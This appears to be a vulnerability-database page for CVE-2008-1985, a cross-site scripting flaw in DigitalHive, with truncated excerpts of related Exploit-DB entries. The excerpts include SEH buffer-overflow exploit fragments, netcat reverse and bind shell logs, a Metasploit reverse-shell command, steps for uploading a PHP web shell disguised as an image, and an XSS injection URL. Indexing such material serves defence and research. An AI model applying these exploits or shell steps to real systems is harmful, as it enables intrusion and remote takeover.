CVE-2008-1985
Published 2008-04-27
Priority P416 · medium · 4.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS 1.46% (70.3th percentile)
Cross-site scripting (XSS) vulnerability in base.php in DigitalHive 2.0 RC2 allows remote attackers to inject arbitrary web script or HTML via the mt parameter, possibly related to membres.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| digital_hive | digitalhive | — | — |
No detection rules found.
Exploit-DB
SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
exploitdb·2010-07-03
CVE-2008-6898 SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)
---
'SEH Overwrite exploited by Blake
'Original EIP method by callAX
'Tested on XP SP3/IE7 in virtualbox
'$ nc 192.168.1.155 4444
'Microsoft Windows XP [Version 5.1.2600]
'(C) Copyright 1985-2001 Microsoft Corp.
'
'C:\Documents and Settings\blake\Desktop>
buffer = String(8349, "A")
nseh = unescape("%eb%06%90%90") ' short jump
seh = unescape("%4E%20%D1%72") ' 0x72D1204E [msacm32.drv]
nops = String(20, unescape("%90")) ' nop sled
junk = String(2000, "C")
Exploit-DB
Digital Hive - Multiple Vulnerabilities
exploitdb·2009-12-14
CVE-2008-1985 Digital Hive - Multiple Vulnerabilities
---
[-]##############################################################
|
| DigitalHive Remote File Upload Vulnerability
|
| Author : ViRuSMaN
|
| Contact : [email protected]
|
| Home : Islam-Attack.CoM , HackTeach.OrG
|
| Download :http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
[-]##############################################################
|
| Exp:
|
| 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
|
|
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
|
| 3-Now upload your shell in "php.jpg" format
|
|
| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
Exploit-DB
VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
exploitdb·2008-10-23
CVE-2008-4686 VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# 10/23/2008 k`sOSe
# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
# 2 - Works both with a local file and with a remote url
# 3 - VLC do not crash!
# 4 - Enjoy a respawing shell, even if VLC will be closed!
#
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:\Program Files\VideoLAN\VLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft C
Exploit-DB
CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2008-09-05·CVSS 7.6
CVE-2008-2639 [HIGH] CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: citect_scada_odbc.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
#
# msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101 TARGET=2 E
# [*] Started reverse handler
# ...
# [*] Sending stage (474 bytes)
# [*] Command shell session 1 opened (192.168.2.101:4444 -> 192.168.2.45:1039)
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Citect\CitectSCADA\Bin>
#
# Arbi
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
Digital Hive 2.0 - 'base.php' Cross-Site Scripting
exploitdb·2008-04-24
CVE-2008-1985 Digital Hive 2.0 - 'base.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/28918/info
Digital Hive is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Digital Hive 2.0 RC2 is vulnerable; other versions may also be affected.
http://www.example.com/a/hive_v2.RC2/base.php?page=membres.php&mt=[XSS]
Exploit-DB
Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
exploitdb·2008-03-26
CVE-2008-1610 Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
---
#!/usr/bin/python
# Quick TFTP Pro 2.1 SEH Overflow (0day)
# Tested on Windows XP SP2.
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt
#########################################################
# bt ~ # quickftp.py
# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)
# [*] http://www.offensive-security.com
# [*] Sending evil packet, ph33r
# [*] Check port 4444 for bindshell
# bt ~ # nc -v 172.16.167.130 4444
# (UNKNOWN) [172.16.167.130] 4444 (krb524) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator>
##########################################################
import socket
import sys
print
No writeups or analysis indexed.
http://www.securityfocus.com/bid/28918
http://www.z0rlu.ownspace.org/index.php?/archives/65-hive-v2.RC2-XSS.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/42006
Published 2008-04-27